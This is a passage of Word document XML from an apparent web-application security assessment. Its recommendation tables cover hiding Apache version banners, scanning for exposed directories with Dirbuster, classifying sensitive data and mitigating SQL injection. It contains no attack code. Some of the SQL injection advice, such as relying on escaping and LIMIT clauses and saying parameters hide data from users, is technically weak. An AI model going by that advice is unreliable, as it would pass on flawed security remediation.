            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p w14:paraId="1F82ACA5" w14:textId="77777777" w:rsidR="00BB073A" w:rsidRPr="004B7B87" w:rsidRDefault="001F27E0" w:rsidP="00017164">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r w:rsidR="00BB073A" w:rsidRPr="004B7B87">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p w14:paraId="7325FE2B" w14:textId="77777777" w:rsidR="00BB073A" w:rsidRPr="004B7B87" w:rsidRDefault="00BB073A" w:rsidP="00017164">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B7B87">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Remediation Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006860F0" w:rsidRPr="004B7B87" w14:paraId="7A8C5659" w14:textId="77777777" w:rsidTr="001F27E0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="7BA55AC2" w14:textId="77777777" w:rsidR="00E3234A" w:rsidRDefault="00E3234A" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Ensure unnecessary information from the webserver such as versioning is not exposed during server responses. Ensure apache software has the following values </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22D3D16F" w14:textId="33165AC7" w:rsidR="00E3234A" w:rsidRDefault="00E3234A" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">ServerTokens Prod </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="712108AA" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="00E3234A" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ServerSignature Off</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BF264AC" w14:textId="70451C3E" w:rsidR="005B3E25" w:rsidRPr="00E3234A" w:rsidRDefault="005B3E25" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>To disable version exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="2D0D0ABA" w14:textId="5CA89563" w:rsidR="006860F0" w:rsidRPr="002469AF" w:rsidRDefault="00E3234A" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E3234A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="68615F27" w14:textId="3EFCC423" w:rsidR="006860F0" w:rsidRPr="006860F0" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E3234A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E3234A" w:rsidRPr="00E3234A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008917C0" w:rsidRPr="004B7B87" w14:paraId="1CC78751" w14:textId="77777777" w:rsidTr="001F27E0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="74D985D8" w14:textId="77777777" w:rsidR="008917C0" w:rsidRDefault="000D46F8" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F0B6DD" w14:textId="64977AFA" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="00E3234A" w:rsidP="00B13939">
            <w:r>
              <w:t>Scan for any passwords that may have been left in code comments using Dirbuster which scans for</w:t>
            </w:r>
            <w:r w:rsidR="00620272">
              <w:t xml:space="preserve"> files or directories. Ensure that any unwanted directories available are not accessible on the web application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="48A41ED1" w14:textId="36C302FF" w:rsidR="008917C0" w:rsidRPr="00C41698" w:rsidRDefault="000D46F8" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00620272">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5B3F0C4B" w14:textId="5FAD79E7" w:rsidR="008917C0" w:rsidRPr="00C41698" w:rsidRDefault="00620272" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C41698" w:rsidRPr="004B7B87" w14:paraId="2554391D" w14:textId="77777777" w:rsidTr="001F27E0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="2D9F01BF" w14:textId="156FE54B" w:rsidR="006860F0" w:rsidRDefault="00620272" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Classify which data is sensitive on a web application and identify where it is stored</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4812D5A0" w14:textId="77777777" w:rsidR="00C41698" w:rsidRPr="00C41698" w:rsidRDefault="000D46F8" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="159A41C8" w14:textId="68D1BA3B" w:rsidR="00C41698" w:rsidRPr="00C41698" w:rsidRDefault="000D46F8" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00620272">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="59DA4349" w14:textId="4EAEA667" w:rsidR="00C41698" w:rsidRPr="00C41698" w:rsidRDefault="00620272" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C41698" w:rsidRPr="004B7B87" w14:paraId="63EA2063" w14:textId="77777777" w:rsidTr="001F27E0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2B1FCF19" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E58C972" w14:textId="77777777" w:rsidR="00C41698" w:rsidRPr="00C41698" w:rsidRDefault="000D46F8" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2F3512AD" w14:textId="77777777" w:rsidR="00C41698" w:rsidRPr="00C41698" w:rsidRDefault="000D46F8" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="221A3EDB" w14:textId="77777777" w:rsidR="00C41698" w:rsidRPr="00C41698" w:rsidRDefault="000D46F8" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27E96516" w14:textId="77777777" w:rsidR="00BB073A" w:rsidRDefault="00BB073A" w:rsidP="00BB073A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FD7BEC8" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="006860F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52BEC490" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="006860F0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc46402735"/>
      <w:r>
        <w:t>Web Application Recommendations - SQL Injections</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="7B87B435" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="006860F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="046C5839" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="006860F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="54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6"/>
        <w:gridCol w:w="2458"/>
        <w:gridCol w:w="1668"/>
      </w:tblGrid>
      <w:tr w:rsidR="006860F0" w:rsidRPr="004B7B87" w14:paraId="273E4AA6" w14:textId="77777777" w:rsidTr="006860F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p w14:paraId="4B813F19" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="004B7B87" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B7B87">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p w14:paraId="385E8B5B" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="004B7B87" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r w:rsidRPr="004B7B87">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p w14:paraId="1E1503C4" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="004B7B87" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B7B87">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Remediation Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006860F0" w:rsidRPr="004B7B87" w14:paraId="6E0B821C" w14:textId="77777777" w:rsidTr="006860F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="1BC290FB" w14:textId="041AA779" w:rsidR="006860F0" w:rsidRPr="00A454B1" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00620272" w:rsidRPr="00620272">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ensure input validation by escaping characters that can be submitted to be used in queries.</w:t>
            </w:r>
            <w:r w:rsidR="005B3E25">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="1240BC63" w14:textId="21B35768" w:rsidR="006860F0" w:rsidRPr="002469AF" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00620272" w:rsidRPr="00620272">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="5887D537" w14:textId="375CF762" w:rsidR="006860F0" w:rsidRPr="006860F0" w:rsidRDefault="00620272" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00620272">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006860F0" w:rsidRPr="004B7B87" w14:paraId="3392104D" w14:textId="77777777" w:rsidTr="006860F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5DD2BE59" w14:textId="3A33EEAF" w:rsidR="006860F0" w:rsidRPr="005B3E25" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00620272">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Use SQL syntax in queries that use data from input and limit the query to return one row. This can be done using keywords Limit in SQL syntax</w:t>
            </w:r>
            <w:r w:rsidR="005B3E25">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="78DD4095" w14:textId="3DA2A3B6" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00620272">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5B0395AE" w14:textId="5E75E316" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E379BA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>16-20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006860F0" w:rsidRPr="004B7B87" w14:paraId="33B65A3C" w14:textId="77777777" w:rsidTr="006860F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="05881685" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="50D496CD" w14:textId="477378B7" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E379BA">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Parameters should be used get information stored into variables.  The parameter can be </w:t>
            </w:r>
            <w:r w:rsidR="00805FB9">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>set in</w:t>
            </w:r>
            <w:r w:rsidR="00E379BA">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> the  SQL query which  hides it from the end user </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="06AA0FF1" w14:textId="1127D20C" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
